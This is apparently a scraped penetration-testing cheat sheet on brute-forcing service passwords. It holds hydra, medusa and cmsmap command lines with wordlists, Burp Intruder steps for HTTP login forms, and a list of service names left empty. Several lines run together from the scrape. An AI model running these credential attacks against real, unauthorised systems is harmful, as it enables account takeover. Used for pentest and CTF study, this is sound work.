Brute-force service password
Web
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l adminLogins
Use Burp suite.
Intecept a login attempt.
Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
Select your payload, your wordlist.
Click attack.
Look for response-length that differs from the rest.
HTTP Basic Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -VHTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.comHydra attack http get 401 login with a dictionary
SSH
SNMP
Remote Desktop Protocol
AFP
AJP
Cassandra Apache
CouchDB
FTP
IMAP
IRC
ISCSI
LDAP
Mongo
MySQL
OracleSQL
POP3
PostgreSQL
PPTP
Redis
Rexec
Rlogin
Rsh
http://pentestmonkey.net/tools/misc/rsh-grind
Rsync
RTSP
SMB
Telnet
VNC
SMTP
Last updated